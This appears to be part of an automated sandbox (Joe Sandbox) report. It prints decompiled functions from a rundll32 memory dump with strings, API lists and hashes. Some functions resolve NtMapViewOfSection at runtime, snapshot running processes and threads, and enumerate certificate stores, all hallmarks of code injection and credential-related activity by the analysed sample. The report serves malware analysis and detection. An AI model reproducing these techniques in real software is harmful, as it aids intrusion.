                                        				E000001C31C33880DC90(__ecx, _t66, _t67, _t68,  *__rcx,  *((intOrPtr*)(__rcx + 8)), _t130, __r8, _t137);
                                        				_t84 =  *_t98;
                                        				 *((long long*)(_t98 + 8)) = _t84;
                                        				 *((long long*)(_t98 + 0x18)) = _t84 + _t130 + __r8;
                                        				goto 0x38703fdf;
                                        				_t132 = _t98 + 0x28;
                                        				if (__r8 -  *_t132 - _t130 <= 0) goto 0x38703f22;
                                        				 *((long long*)(_t135 + 0x20)) = 0x3889d200;
                                        				 *((long long*)(_t135 + 0x28)) = 0x3889d200;
                                        				 *((long long*)(_t135 + 0x30)) = 0x3889d200;
                                        				 *((long long*)(_t135 + 0x38)) = "basic_flat_buffer overflow";
                                        				 *((char*)(_t135 + 0x40)) = 1;
                                        				E000001C31C33880E0E4(_t98, _t135 + 0x38, _t135 + 0x28, _t130, __r8);
                                        				 *((long long*)(_t135 + 0x20)) = 0x3889d240;
                                        				 *((long long*)(_t135 + 0x20)) = 0x3889d270;
                                        				E000001C31C3386FE350(_t98, _t135 + 0xa8, _t135 + 0x20);
                                        				 *0x1C33889D298 = "class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)";
                                        				 *0x1C33889D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/flat_buffer.ipp";
                                        				 *0x1C33889D2A8 = 0x105;
                                        				E000001C31C3387012E0(0x3889d270, _t135 + 0xe8);
                                        				E000001C31C338701320(_t63, _t98, _t135 + 0x50, 0x3889d270, _t131);
                                        				E000001C31C3388103EC(_t98, _t135 + 0x50, 0x388e4b98, _t131);
                                        				 *((long long*)(_t135 + 0x160)) = _t130 + _t137;
                                        				 *((long long*)(_t135 + 0x170)) = _t130 + _t130;
                                        				_t126 =  >=  ? _t135 + 0x170 : _t135 + 0x160;
                                        				_t93 =  *_t132;
                                        				_t133 =  <  ? _t126 : _t132;
                                        				_t134 =  *((intOrPtr*)( <  ? _t126 : _t132));
                                        				if (_t134 != 0) goto 0x38703f6a;
                                        				r15d = 0;
                                        				goto 0x38703fa0;
                                        				if (_t134 - 0x1000 < 0) goto 0x38703f95;
                                        				if (_t134 + 0x27 - _t134 > 0) goto 0x38703f82;
                                        				E000001C31C33880A170(_t93);
                                        				asm("int3");
                                        				E000001C31C33880B674(_t93, _t134 + 0x27);
                                        				_t38 = _t93 + 0x27; // 0x27
                                        				 *((long long*)((_t38 & 0xffffffe0) - 8)) = _t93;
                                        				goto 0x38703fa0;
                                        				E000001C31C33880B674(_t93, _t134);
                                        				_t145 = _t93;
                                        				if ( *_t98 == 0) goto 0x38703fc4;
                                        				E000001C31C33880DC90(_t64, _t66, _t67, _t68, _t145,  *((intOrPtr*)(_t98 + 8)), _t130, _t131, _t130);
                                        				_t62 = E000001C31C3386E83F0(_t64, _t65, _t98,  *_t98,  *((intOrPtr*)(_t98 + 0x20)) -  *_t98);
                                        				 *_t98 = _t145;
                                        				 *((long long*)(_t98 + 8)) = _t145;
                                        				_t117 = _t145 + _t130;
                                        				 *((long long*)(_t98 + 0x18)) = _t117 + _t131;
                                        				 *((long long*)(_t98 + 0x20)) = _t145 + _t134;
                                        				 *((long long*)(_t142 + 8)) = _t131;
                                        				 *_t142 = _t117;
                                        				 *((long long*)(_t98 + 0x10)) = _t117;
                                        				return _t62;
                                        			}


























                                        Strings
                                        • class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64), xrefs: 000001C338703ED5
                                        • basic_flat_buffer overflow, xrefs: 000001C338703E89
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/flat_buffer.ipp, xrefs: 000001C338703EE0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/flat_buffer.ipp$basic_flat_buffer overflow$class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)
                                        • API String ID: 0-1740500164
                                        • Opcode ID: 038e367d882b75aa0431399039ffe50f6ab25b771d27c9cdcc5c079fdbff2d8b
                                        • Instruction ID: dd567c61736b9e12724d5c55b34d75603442338c5cc11c471332430fa7b8d572
                                        • Opcode Fuzzy Hash: 038e367d882b75aa0431399039ffe50f6ab25b771d27c9cdcc5c079fdbff2d8b
                                        • Instruction Fuzzy Hash: 78518EB2241FC094EB21DF64E5847DE73A5F788B98F509226DAAD077A8DF38C255C341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 24%
                                        			E000001C31C3386EFC60(long long _a8, long long _a16, long long _a24) {
                                        				char _v40;
                                        				long long _v48;
                                        				long long _v56;
                                        				intOrPtr _v64;
                                        				long long _v72;
                                        				intOrPtr _v80;
                                        				long long _v88;
                                        				long _t39;
                                        				long long _t51;
                                        				long long _t53;
                                        				long long _t54;
                                        				long long _t57;
                                        				long long _t67;
                                        				long long _t71;
                                        				long long _t73;
                                        				void* _t78;
                                        
                                        				_v72 = 0xfffffffe;
                                        				_a24 = _t53;
                                        				_t54 = _t67;
                                        				_t71 = _t57;
                                        				_v48 = _t57 + 0x60;
                                        				EnterCriticalSection(??);
                                        				_v40 = 1;
                                        				_t51 =  *((intOrPtr*)(_t71 + 0x88));
                                        				 *((long long*)(_t54 + 8)) = _t51;
                                        				 *((long long*)(_t71 + 0x88)) = _t54;
                                        				if ( *((intOrPtr*)(_t71 + 0x50)) != _t73) goto 0x386efd28;
                                        				r8d = 0;
                                        				CreateWaitableTimerA(??, ??, ??);
                                        				 *((long long*)(_t71 + 0x50)) = _t51;
                                        				if (_t51 != 0) goto 0x386efcf2;
                                        				_t39 = GetLastError();
                                        				E000001C31C33880D880(_t57 + 0x60, _t67);
                                        				_v64 = _t39;
                                        				_v56 = _t51;
                                        				if (_t39 == 0) goto 0x386efcf2;
                                        				E000001C31C3386EE680("timer");
                                        				asm("int3");
                                        				_a8 = 0x4d2fa200;
                                        				_v80 = 0;
                                        				_v88 = _t73;
                                        				r9d = 0;
                                        				r8d = 0x493e0;
                                        				SetWaitableTimer(??, ??, ??, ??, ??, ??);
                                        				if ( *((intOrPtr*)(_t71 + 0x48)) != _t73) goto 0x386efdab;
                                        				E000001C31C33880B674(0x4d2fa200,  *((intOrPtr*)(_t71 + 0x50)));
                                        				_a8 = 0x4d2fa200;
                                        				 *0xFFFFFFFF4D2FA208 = _t73;
                                        				 *0xFFFFFFFF4D2FA210 = _t73;
                                        				E000001C31C33880B674(0x4d2fa200,  *((intOrPtr*)(_t71 + 0x50)));
                                        				_a16 = 0x4d2fa200;
                                        				 *0x4d2fa200 = 0x388b1570;
                                        				 *0x4d2fa200 = 0x388b1bb0;
                                        				 *0xFFFFFFFF4D2FA218 = _t71;
                                        				r8d = 0x10000;
                                        				E000001C31C3386EEF50(0x4d2fa200, 0x4d2fa200, 0x4d2fa200, 0x4d2fa200, _t78);
                                        				if ( *((intOrPtr*)(_t71 + 0x48)) == 0) goto 0x386efda7;
                                        				CloseHandle(??);
                                        				0x3880bdc8();
                                        				 *((long long*)(_t71 + 0x48)) = 0x4d2fa200;
                                        				return LeaveCriticalSection(??);
                                        			}



















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TimerWaitable$CloseCreateCriticalEnterErrorExceptionHandleInit_thread_footerLastSectionThrow__std_exception_copy
                                        • String ID: timer
                                        • API String ID: 1177437407-1792073242
                                        • Opcode ID: 569b81e12f945619493bd48da6d215cc9a7284f26144e8d236e8c08901ac4815
                                        • Instruction ID: 14be5296d15dfe7b16833fa1b338cb30f8380e70da8f937d5d9dfb0fe9125170
                                        • Opcode Fuzzy Hash: 569b81e12f945619493bd48da6d215cc9a7284f26144e8d236e8c08901ac4815
                                        • Instruction Fuzzy Hash: 52317C32241BC086FB649F25E840BD973A4FB84B90F54922ADFA94BB95DF38D664C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cert$Certificate$ContextPropertyStore$CertificatesEnumFind
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_cert_get_fname
                                        • API String ID: 1407214842-2690582526
                                        • Opcode ID: 77d0f3dfedcc36c35fb8292c1e144379b79b8c0813163f59157cd21200c65742
                                        • Instruction ID: a69e60a1c98ec0479bd75c7459810db6934918a578998fb00168092057d6988c
                                        • Opcode Fuzzy Hash: 77d0f3dfedcc36c35fb8292c1e144379b79b8c0813163f59157cd21200c65742
                                        • Instruction Fuzzy Hash: 0741C6333907D046FA50DB62E804FE667A2B749BD4F48E023DD6947B96DA39C745CB02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E000001C31C33871B9B0(long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, char _a32) {
                                        				void* _v24;
                                        				char _v40;
                                        				intOrPtr _v48;
                                        				signed int _v56;
                                        				intOrPtr _v64;
                                        				long long _v72;
                                        				long long _v80;
                                        				signed long long _v88;
                                        				struct HINSTANCE__* _t45;
                                        				struct HINSTANCE__* _t48;
                                        				void* _t54;
                                        				void* _t59;
                                        				WCHAR* _t61;
                                        
                                        				_t59 = _t54;
                                        				 *((long long*)(_t59 + 8)) = __rbx;
                                        				 *((long long*)(_t59 + 0x10)) = __rbp;
                                        				 *(_t59 - 0x28) =  *(_t59 - 0x28) & 0x00000000;
                                        				 *(_t59 + 0x20) =  *(_t59 + 0x20) & 0x00000000;
                                        				 *((intOrPtr*)(_t59 + 0x24)) = 0;
                                        				GetModuleHandleW(_t61);
                                        				GetProcAddress(_t45);
                                        				GetProcAddress(_t48);
                                        				_v48 = 0x40;
                                        				r9d = 0;
                                        				_v56 = _v56 & 0x00000000;
                                        				_v64 = 2;
                                        				_v72 =  &_v40;
                                        				_v80 =  &_a32;
                                        				_v88 = _v88 & 0x00000000;
                                        				 *__rax();
                                        				return  *__rax();
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: @$NtMapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 667068680-1608534789
                                        • Opcode ID: b2b9b886758cbfbfa2d1ecb312041d743efba4d65bf52864f5adb2240458c07b
                                        • Instruction ID: 3bd9cb056c0e53d729811d441e993cfa96726c390991d372102744353f862aad
                                        • Opcode Fuzzy Hash: b2b9b886758cbfbfa2d1ecb312041d743efba4d65bf52864f5adb2240458c07b
                                        • Instruction Fuzzy Hash: AF114632214B808AEB109F12F848B9977A4F38CBA5F558136DE6D87714EB79C689CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E000001C31C33882A6E4(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
                                        				void* __rsi;
                                        				void* _t118;
                                        				unsigned int _t135;
                                        				void* _t139;
                                        				void* _t142;
                                        				void* _t145;
                                        				char _t154;
                                        				char _t155;
                                        				char _t156;
                                        				long long _t186;
                                        				long long _t220;
                                        				intOrPtr _t221;
                                        				signed short* _t235;
                                        				signed int* _t238;
                                        				char* _t241;
                                        				signed short* _t250;
                                        				signed long long _t255;
                                        				signed long long _t256;
                                        				signed long long _t261;
                                        				void* _t263;
                                        				signed short* _t264;
                                        				long _t270;
                                        				DWORD* _t272;
                                        				signed long long _t274;
                                        				void* _t276;
                                        				void* _t277;
                                        				long long _t279;
                                        				signed short* _t281;
                                        				signed short* _t288;
                                        				void* _t292;
                                        				void* _t294;
                                        				void* _t297;
                                        				void* _t299;
                                        				char* _t301;
                                        				char* _t302;
                                        				char* _t303;
                                        
                                        				_t279 = __r8;
                                        				_t145 = __ebx;
                                        				 *((long long*)(_t276 + 0x18)) = __rbx;
                                        				 *((long long*)(_t276 + 0x10)) = __rdx;
                                        				_t277 = _t276 - 0x60;
                                        				r12d = r8d;
                                        				if (r13d != 0xfffffffe) goto 0x3882a725;
                                        				E000001C31C338818964(__rax);
                                        				 *__rax = 0;
                                        				E000001C31C338818984(__rax);
                                        				 *__rax = 9;
                                        				goto 0x3882ab2e;
                                        				if (__ecx < 0) goto 0x3882ab17;
                                        				if (r13d -  *0x3890b120 >= 0) goto 0x3882ab17;
                                        				_t3 = _t270 + 1; // 0x1
                                        				r8d = _t3;
                                        				 *((long long*)(_t277 + 0x48)) = __r8;
                                        				_t274 = __ecx << 6;
                                        				_t255 = __ecx >> 6;
                                        				 *(_t277 + 0x40) = _t255;
                                        				_t220 =  *((intOrPtr*)(0x3890ad20 + _t255 * 8));
                                        				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x3882ab17;
                                        				if (r12d - 0x7fffffff <= 0) goto 0x3882a791;
                                        				E000001C31C338818964(_t220);
                                        				 *_t220 = 0;
                                        				E000001C31C338818984(_t220);
                                        				 *_t220 = 0x16;
                                        				goto 0x3882ab29;
                                        				if (r12d == 0) goto 0x3882ab13;
                                        				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x3882ab13;
                                        				_t186 = __rdx;
                                        				if (_t186 == 0) goto 0x3882a77a;
                                        				r10d =  *((char*)(_t220 + _t274 + 0x39));
                                        				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
                                        				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
                                        				if (_t186 == 0) goto 0x3882a7ec;
                                        				if (_t186 != 0) goto 0x3882a7e1;
                                        				if ((r8b &  !r12d) == 0) goto 0x3882a7f6;
                                        				r14d = r12d;
                                        				goto 0x3882a88c;
                                        				if ((r8b &  !r12d) != 0) goto 0x3882a812;
                                        				E000001C31C338818964(_t220);
                                        				 *_t220 = 0;
                                        				_t118 = E000001C31C338818984(_t220);
                                        				 *_t220 = 0x16;
                                        				E000001C31C338811BC8(_t118);
                                        				goto 0x3882a998;
                                        				r14d = r12d;
                                        				r14d = r14d >> 1;
                                        				r14d =  <  ? 4 : r14d;
                                        				E000001C31C338822878(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                        				_t241 = _t220;
                                        				E000001C31C338824EE0(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                        				E000001C31C338824EE0(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                        				_t301 = _t241;
                                        				if (_t241 != 0) goto 0x3882a85b;
                                        				E000001C31C338818984(_t220);
                                        				 *_t220 = 0xc;
                                        				E000001C31C338818964(_t220);
                                        				 *_t220 = 8;
                                        				goto 0x3882a998;
                                        				_t26 = _t255 + 1; // 0x1
                                        				r8d = _t26;
                                        				E000001C31C33882AE90(r13d, _t241, _t241, _t255, _t270, _t299, _t297);
                                        				_t256 =  *(_t277 + 0x40);
                                        				r10b =  *((intOrPtr*)(_t277 + 0xa0));
                                        				r8d = 1;
                                        				 *((long long*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x30)) = _t220;
                                        				_t221 =  *((intOrPtr*)(0x3890ad20 + _t256 * 8));
                                        				 *((long long*)(_t277 + 0x50)) = _t301;
                                        				r9d = 0xa;
                                        				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x3882a921;
                                        				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
                                        				if (_t154 == r9b) goto 0x3882a921;
                                        				if (r14d == 0) goto 0x3882a921;
                                        				 *_t301 = _t154;
                                        				r14d = r14d - 1;
                                        				_t302 = _t301 + _t279;
                                        				 *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
                                        				if (r10b == 0) goto 0x3882a921;
                                        				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3b));
                                        				if (_t155 == r9b) goto 0x3882a921;
                                        				if (r14d == 0) goto 0x3882a921;
                                        				 *_t302 = _t155;
                                        				_t303 = _t302 + _t279;
                                        				r14d = r14d - 1;
                                        				 *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
                                        				if (r10b != r8b) goto 0x3882a921;
                                        				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3c));
                                        				if (_t156 == r9b) goto 0x3882a921;
                                        				if (r14d == 0) goto 0x3882a921;
                                        				 *_t303 = _t156;
                                        				r14d = r14d - 1;
                                        				 *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
                                        				if (E000001C31C3388340B4(r13d, 0,  *((intOrPtr*)(0x3890ad20 + _t256 * 8))) == 0) goto 0x3882a9b6;
                                        				if (( *( *(0x3890ad20 +  *(_t277 + 0x40) * 8) + _t274 + 0x38) & 0x00000080) == 0) goto 0x3882a9b6;
                                        				if (GetConsoleMode(_t294) == 0) goto 0x3882a9b6;
                                        				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x3882a9bb;
                                        				r14d = r14d >> 1;
                                        				r8d = r14d;
                                        				 *(_t277 + 0x20) = _t270;
                                        				if (ReadConsoleW(_t292, _t263, _t270, _t272) != 0) goto 0x3882a9aa;
                                        				E000001C31C338818914(GetLastError(),  *(0x3890ad20 +  *(_t277 + 0x40) * 8), _t241);
                                        				E000001C31C338824EE0( *(0x3890ad20 +  *(_t277 + 0x40) * 8), _t241);
                                        				goto 0x3882ab31;
                                        				goto 0x3882a9f6;
                                        				 *((intOrPtr*)(_t277 + 0x48)) = sil;
                                        				r8d = r14d;
                                        				 *(_t277 + 0x20) = _t270;
                                        				if (ReadFile(??, ??, ??, ??, ??) == 0) goto 0x3882aadd;
                                        				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x3882aadd;
                                        				if (( *( *(0x3890ad20 +  *(_t277 + 0x40) * 8) + _t274 + 0x38) & 0x00000080) == 0) goto 0x3882a99b;
                                        				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x3882aa3f;
                                        				_t261 = _t303 + _t279;
                                        				 *(_t277 + 0x20) = _t292 >> 1;
                                        				_t135 = E000001C31C33882A2CC(_t145, r13d, _t263 +  *(0x3890ad20 +  *(_t277 + 0x40) * 8) * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 +  *(0x3890ad20 +  *(_t277 + 0x40) * 8) * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
                                        				goto 0x3882a99b;
                                        				if (_t135 == 0) goto 0x3882aac5;
                                        				_t281 =  *((intOrPtr*)(_t277 + 0x50));
                                        				_t250 = _t281;
                                        				_t264 = _t281;
                                        				_t288 =  &(_t281[_t135 >> 1]);
                                        				if (_t281 - _t288 >= 0) goto 0x3882aab8;
                                        				_t235 =  &(_t281[1]);
                                        				r9d =  *_t250 & 0x0000ffff;
                                        				if (r9w == 0x1a) goto 0x3882aaaf;
                                        				if (r9w != 0xd) goto 0x3882aa98;
                                        				if (_t235 - _t288 >= 0) goto 0x3882aa98;
                                        				if ( *_t235 != 0xa) goto 0x3882aa98;
                                        				 *_t264 = 0xa;
                                        				goto 0x3882aaa8;
                                        				_t264[1] = r9w;
                                        				if ( &(_t250[3]) - _t288 < 0) goto 0x3882aa6b;
                                        				goto 0x3882aab8;
                                        				_t238 =  *((intOrPtr*)(0x3890ad20 + _t261 * 8));
                                        				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
                                        				goto 0x3882a99b;
                                        				E000001C31C33882A09C(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
                                        				goto 0x3882aa38;
                                        				if (GetLastError() != 5) goto 0x3882ab03;
                                        				E000001C31C338818984(_t238);
                                        				 *_t238 = 9;
                                        				_t139 = E000001C31C338818964(_t238);
                                        				 *_t238 = 5;
                                        				goto 0x3882a998;
                                        				if (_t139 != 0x6d) goto 0x3882a991;
                                        				goto 0x3882a99b;
                                        				goto 0x3882ab31;
                                        				E000001C31C338818964(_t238);
                                        				 *_t238 = 0xa;
                                        				_t142 = E000001C31C338818984(_t238);
                                        				 *_t238 = 9;
                                        				return E000001C31C338811BC8(_t142) | 0xffffffff;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: 85039758f41dacebd534613da7e23378369313d7fa09b1725c46ce5cfee4d8e3
                                        • Instruction ID: 96c727e8728cbf1c0e0aef463f8bce81e7e89f76a234b962a10edddc2bf06a9d
                                        • Opcode Fuzzy Hash: 85039758f41dacebd534613da7e23378369313d7fa09b1725c46ce5cfee4d8e3
                                        • Instruction Fuzzy Hash: 75C1CF322447C586FA619F15D440BEE6B91BB80BD0F66E107EEAA0B7D5CB38CA45C703
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cert$Store$CertificatesEnum$CertificateCloseContextFreeOpen
                                        • String ID: Certificate %d$Listing certs for store %s
                                        • API String ID: 598586232-3674431298
                                        • Opcode ID: 9f3355f9253c1a9d0f375a5dbe4cc5038aeee279d3360d4d20c44a1df265f27f
                                        • Instruction ID: 972963f7baf74e54009b492c13ee4acf1b692e176b6f0782332cddb2bc2d60fa
                                        • Opcode Fuzzy Hash: 9f3355f9253c1a9d0f375a5dbe4cc5038aeee279d3360d4d20c44a1df265f27f
                                        • Instruction Fuzzy Hash: 9421B472381BC046FE559F17A9187DA6692BB49FC0F08E0269D2E0B756EE38C7468302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000001C31C338718890(signed int __edx, void* __eflags, void* __rcx) {
                                        				void* _v72;
                                        				signed char _t8;
                                        				signed int _t10;
                                        
                                        				_t10 = __edx & 0x00000017;
                                        				 *(__rcx + 0x10) = _t10;
                                        				_t8 =  *(__rcx + 0x14) & _t10;
                                        				if (__eflags == 0) goto 0x387188b5;
                                        				if (r8b != 0) goto 0x387188ba;
                                        				if ((_t8 & 0x00000004) != 0) goto 0x387188c4;
                                        				if ((_t8 & 0x00000002) != 0) goto 0x387188ef;
                                        				goto 0x3871891a;
                                        				return _t8;
                                        			}







                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 432778473-1866435925
                                        • Opcode ID: e2f2f8f4cb01b9a1532ecc18cf1df01b357efa897e85c791b1842b17e1414af0
                                        • Instruction ID: a6eab55d10202287d9b416dbdfbe83f2bb820ee9224ae2689a0289419938d893
                                        • Opcode Fuzzy Hash: e2f2f8f4cb01b9a1532ecc18cf1df01b357efa897e85c791b1842b17e1414af0
                                        • Instruction Fuzzy Hash: 461181312A15C651FE54EB15D896EDD2312FB90744F84F413E56A0ACA6EE3CC705C382
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: NtUnmapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 667068680-3998908438
                                        • Opcode ID: 6f9dc40e55cc84c4bcad7d28686e4125d510a5ef1c01b7f2f6dba7ddb1910b07
                                        • Instruction ID: faafc447c7e0dcaa43eb8fd739218276f0aec68286f5c98c6ab5e4dc67424c1d
                                        • Opcode Fuzzy Hash: 6f9dc40e55cc84c4bcad7d28686e4125d510a5ef1c01b7f2f6dba7ddb1910b07
                                        • Instruction Fuzzy Hash: B0F01D31745B8185EE05DF16F8445997760F79CFD0F48A036AE6E4B729EE3CC6858740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerSocket
                                        • String ID:
                                        • API String ID: 3979501240-0
                                        • Opcode ID: ddb4365dd0928ee9723c442f63b07f9436e9a0590a6810949821ec7c1c7811ca
                                        • Instruction ID: 5050dd0e553bdb3afc1def29d4cfabdc3b901a08b92a92ae9ede106c10219e42
                                        • Opcode Fuzzy Hash: ddb4365dd0928ee9723c442f63b07f9436e9a0590a6810949821ec7c1c7811ca
                                        • Instruction Fuzzy Hash: D1516B32A04BD18AF3208FB4A841AED7760F715378F10E716EF7916ADADB78D2948341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateOpenThread32$CloseFirstHandleInstanceNextProcessSnapshotThreadToolhelp32
                                        • String ID:
                                        • API String ID: 684471368-0
                                        • Opcode ID: 4619a8d8edc4ac160eccb4117f5135ab4275e03fabb9f83d5719aa648d199cb1
                                        • Instruction ID: 38e77b57ed9c845192f0d977dfed878949e22fc7b78f49d863f173ac7886e226
                                        • Opcode Fuzzy Hash: 4619a8d8edc4ac160eccb4117f5135ab4275e03fabb9f83d5719aa648d199cb1
                                        • Instruction Fuzzy Hash: BD218632654B848AF750CF12F444A9AB7A6F784BC0F099026EF9A47F58DF38D645CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E000001C31C33882BA24(long long __rbx, signed int* __rcx, intOrPtr* __rdx, signed int __rsi, long long __rbp, void* _a8, void* _a16, void* _a24) {
                                        				signed int _t29;
                                        				signed int _t32;
                                        				void* _t46;
                                        				signed int _t49;
                                        				void* _t54;
                                        				signed int _t65;
                                        				void* _t72;
                                        				signed int _t78;
                                        				signed int _t83;
                                        				void* _t98;
                                        				signed short* _t103;
                                        				signed short* _t104;
                                        				signed short* _t106;
                                        				signed short* _t108;
                                        				signed short* _t109;
                                        				signed short* _t110;
                                        				signed short* _t111;
                                        				signed int* _t115;
                                        				void* _t132;
                                        				void* _t135;
                                        
                                        				_t115 = __rcx;
                                        				_t98 = _t132;
                                        				 *((long long*)(_t98 + 8)) = __rbx;
                                        				 *((long long*)(_t98 + 0x10)) = __rbp;
                                        				 *((long long*)(_t98 + 0x18)) = __rsi;
                                        				 *((long long*)(_t98 - 0x18)) = __rcx;
                                        				asm("movsd xmm0, [eax-0x18]");
                                        				asm("movsd [edi], xmm0");
                                        				_t5 =  &(_t115[8]); // 0x20
                                        				_t65 = _t5;
                                        				__rcx[2] = 0;
                                        				__rcx[1] =  *0x3890b288;
                                        				if ( *__rdx != _t65) goto 0x3882ba6a;
                                        				_t103 = __rdx + 2;
                                        				if ( *_t103 == _t65) goto 0x3882ba61;
                                        				_t29 =  *_t103 & 0x0000ffff;
                                        				if (_t29 == 0x61) goto 0x3882ba95;
                                        				if (_t29 == 0x72) goto 0x3882ba8a;
                                        				if (_t29 != 0x77) goto 0x3882bcbd;
